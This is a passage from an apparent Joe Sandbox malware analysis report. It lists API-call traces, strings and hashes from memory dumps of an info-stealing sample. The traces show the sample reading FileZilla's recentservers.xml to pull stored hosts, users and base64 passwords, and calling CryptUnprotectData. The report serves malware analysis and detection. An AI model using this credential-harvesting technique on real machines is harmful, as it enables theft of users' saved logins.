                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: A4111F75604204BFEB00CF94DC98FA733AAAF89794F409558FA099B250D7B5E881DBA0
                                                  APIs
                                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptString
                                                  • String ID:
                                                  • API String ID: 80407269-0
                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D56
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,02F05155,00000000,?), ref: 02F09D68
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02F05155,00000000,00000000), ref: 02F09D91
                                                  • LocalFree.KERNEL32(?,?,?,?,02F05155,00000000,?), ref: 02F09DA6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID:
                                                  • API String ID: 4291131564-0
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: a13a9ebdb8c8ede923b372235047adf60feb4219f6878d11dd2c1d6130a635c1
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 89119474641208EFEB10CF94C895BAA77A5EB49704F208058FE159B390C7B6A901CB90
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02F09DEB
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 02F09E0A
                                                  • memcpy.MSVCRT(?,?,?), ref: 02F09E2D
                                                  • LocalFree.KERNEL32(?), ref: 02F09E3A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: d0800abff6e7a4abfdc1f1c7c2eca6d658118a09426f00c7b61f6d5866666090
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 4C110CB8A00209EFDB04CFA4DA89AAE77B5FF89704F108558F91597390D770AE10CF61
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                  • String ID:
                                                  • API String ID: 3243516280-0
                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02D49470,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02D49470,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02D49470,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                  • wsprintfA.USER32 ref: 00417AB7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 362916592-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                  APIs
                                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID:
                                                  • API String ID: 123533781-0
                                                  • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                  • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                  • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction ID: eb41b3d3e01398cc11cf0492c21b873dccf3bce470a5e4f17b1a3ff5bcade897
                                                  • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                  • Instruction Fuzzy Hash: 1471D431452F40EBD7633B31DD01E4A7AA37F24782F904924A3DB29D70DE226869EF51
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • strtok_s.MSVCRT ref: 0041031B
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                    • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                    • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                  • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                  • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                  • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                  • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                  • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                  • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                  • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                  • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                  • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                  • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                  • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                  • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                  • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                  • strtok_s.MSVCRT ref: 00410679
                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                  • memset.MSVCRT ref: 004106DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                  • API String ID: 337689325-514892060
                                                  • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                  • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                  APIs
                                                  • lstrlen.KERNEL32(00424DA0), ref: 02F04833
                                                  • lstrlen.KERNEL32(00424E50), ref: 02F0483E
                                                  • lstrlen.KERNEL32(00424F18), ref: 02F04849
                                                  • lstrlen.KERNEL32(00424FD0), ref: 02F04854
                                                  • lstrlen.KERNEL32(00425078), ref: 02F0485F
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02F0486E
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F04875
                                                  • lstrlen.KERNEL32(00425120), ref: 02F04883
                                                  • lstrlen.KERNEL32(004251C8), ref: 02F0488E
                                                  • lstrlen.KERNEL32(00425270), ref: 02F04899
                                                  • lstrlen.KERNEL32(00425318), ref: 02F048A4
                                                  • lstrlen.KERNEL32(?), ref: 02F048AF
                                                  • lstrlen.KERNEL32(00425468), ref: 02F048C3
                                                  • lstrlen.KERNEL32(00425510), ref: 02F048CE
                                                  • lstrlen.KERNEL32(004255B8), ref: 02F048D9
                                                  • lstrlen.KERNEL32(00425660), ref: 02F048E4
                                                  • lstrlen.KERNEL32(00425708), ref: 02F048EF
                                                  • lstrlen.KERNEL32(004257B0), ref: 02F04918
                                                  • lstrlen.KERNEL32(00425858), ref: 02F04923
                                                  • lstrlen.KERNEL32(00425920), ref: 02F0492E
                                                  • lstrlen.KERNEL32(004259C8), ref: 02F04939
                                                  • lstrlen.KERNEL32(00425A70), ref: 02F04944
                                                  • strlen.MSVCRT ref: 02F04957
                                                  • lstrlen.KERNEL32(00425B18), ref: 02F0497F
                                                  • lstrlen.KERNEL32(00425BC0), ref: 02F0498A
                                                  • lstrlen.KERNEL32(00425C68), ref: 02F04995
                                                  • lstrlen.KERNEL32(00425D10), ref: 02F049A0
                                                  • lstrlen.KERNEL32(00425DB8), ref: 02F049AB
                                                  • lstrlen.KERNEL32(00425E60), ref: 02F049BB
                                                  • lstrlen.KERNEL32(00425F08), ref: 02F049C6
                                                  • lstrlen.KERNEL32(00425FB0), ref: 02F049D1
                                                  • lstrlen.KERNEL32(00426058), ref: 02F049DC
                                                  • lstrlen.KERNEL32(00426100), ref: 02F049E7
                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 02F04A03
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                  • String ID:
                                                  • API String ID: 2127927946-0
                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction ID: a3778dcac760c55b59ea42512594c0fb069f6bfdbb2bd07da4b1ee319edcb335
                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                  • Instruction Fuzzy Hash: 7441BA79740624EBC718AFE5FC8DB987F71AB4C712BA0C062FA0295190CBB5D5119B3D
                                                  APIs
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 02F19B08
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 02F19B21
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02F19B39
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02F19B51
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02F19B6A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02F19B82
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02F19B9A
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02F19BB3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02F19BCB
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02F19BE3
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02F19BFC
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02F19C14
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02F19C2C
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02F19C45
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02F19C5D
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02F19C75
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02F19C8E
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02F19CA6
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02F19CBE
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02F19CD7
                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02F19CEF
                                                  • LoadLibraryA.KERNEL32(0064A550,?,02F16C67), ref: 02F19D01
                                                  • LoadLibraryA.KERNEL32(0064A17C,?,02F16C67), ref: 02F19D12
                                                  • LoadLibraryA.KERNEL32(0064A104,?,02F16C67), ref: 02F19D24
                                                  • LoadLibraryA.KERNEL32(0064A1DC,?,02F16C67), ref: 02F19D36
                                                  • LoadLibraryA.KERNEL32(0064A328,?,02F16C67), ref: 02F19D47
                                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02F19D69
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02F19D8A
                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02F19DA2
                                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02F19DC4
                                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02F19DE5
                                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02F19E06
                                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02F19E1D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID:
                                                  • API String ID: 2238633743-0
                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction ID: b72d1b3e3df0bfec9a00734b8f096189ebefe5d0a4d48d522bb88827a677677b
                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                  • Instruction Fuzzy Hash: 54A14CBD5C0240BFE364EFE8ED989A63BFBF74E201704661AE605C3264D739A441DB52
                                                  APIs
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02F19072
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                    • Part of subcall function 02F09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                    • Part of subcall function 02F09C27: LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                    • Part of subcall function 02F09C27: ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                    • Part of subcall function 02F09C27: LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                    • Part of subcall function 02F09C27: CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                    • Part of subcall function 02F19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02F190B9
                                                  • strtok_s.MSVCRT ref: 02F10582
                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 02F105C9
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F105D0
                                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 02F105EC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F105FA
                                                    • Part of subcall function 02F18B47: malloc.MSVCRT ref: 02F18B4F
                                                    • Part of subcall function 02F18B47: strncpy.MSVCRT ref: 02F18B6A
                                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 02F10636
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10644
                                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 02F10680
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F1068E
                                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 02F106CA
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F106DC
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10769
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10781
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F10799
                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F107B1
                                                  • lstrcat.KERNEL32(?,0042164C), ref: 02F107C9
                                                  • lstrcat.KERNEL32(?,00421660), ref: 02F107D8
                                                  • lstrcat.KERNEL32(?,00421670), ref: 02F107E7
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F107FA
                                                  • lstrcat.KERNEL32(?,00421678), ref: 02F10809
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1081C
                                                  • lstrcat.KERNEL32(?,0042167C), ref: 02F1082B
                                                  • lstrcat.KERNEL32(?,00421680), ref: 02F1083A
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1084D
                                                  • lstrcat.KERNEL32(?,00421688), ref: 02F1085C
                                                  • lstrcat.KERNEL32(?,0042168C), ref: 02F1086B
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F1087E
                                                  • lstrcat.KERNEL32(?,00421698), ref: 02F1088D
                                                  • lstrcat.KERNEL32(?,0042169C), ref: 02F1089C
                                                  • strtok_s.MSVCRT ref: 02F108E0
                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02F108F5
                                                  • memset.MSVCRT ref: 02F10944
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                  • String ID:
                                                  • API String ID: 3689735781-0
                                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction ID: 39c683ee20d57d6211f8718361267a69fa3d9d8d2f9858e599037497570b8015
                                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                  • Instruction Fuzzy Hash: 32D15B75A41208ABCB04FBF0DD95EEEB77AFF14740F904519E202A6090EF74AA49CF61
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
